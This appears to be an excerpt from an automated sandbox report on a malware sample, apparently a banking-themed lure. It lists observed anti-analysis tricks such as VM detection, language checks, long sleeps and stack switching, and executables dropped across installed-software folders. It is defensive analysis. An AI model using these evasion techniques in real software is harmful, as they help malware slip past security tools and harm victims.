Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7800, type: MEMORYSTR

Contains functionality to behave differently if execute on a Russian/Kazak computer

Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 12_2_009952A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]		12_2_009952A0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 13_2_00CD52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]		13_2_00CD52A0

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\differences\niellist.exe	API/Special instruction interceptor: Address: CEA034
Source: C:\Users\user\AppData\Local\differences\niellist.exe	API/Special instruction interceptor: Address: AFC28C

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\AppData\Local\Temp\build.exe	Memory allocated: 17B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Memory allocated: 3210000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Memory allocated: 5210000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Memory allocated: 1330000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Memory allocated: 1AEB0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\XClient.exe	Memory allocated: 8B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\XClient.exe	Memory allocated: 1A610000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\XClient.exe	Memory allocated: 1370000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\XClient.exe	Memory allocated: 1B110000 memory reserve \| memory write watch

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

9_2_004019F0

Contains long sleeps (>= 3 min)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 922337203685477

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5402
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4432
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6610
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2993
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6573
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3193
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5865
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3893

Found dropped PE file which has not been started or loaded

Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\7z.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Dropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Dropped PE file which has not been started: C:\Windows\System32\AppVClient.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Dropped PE file which has not been started: C:\Windows\System32\msiexec.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Dropped PE file which has not been started: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	Jump to dropped file
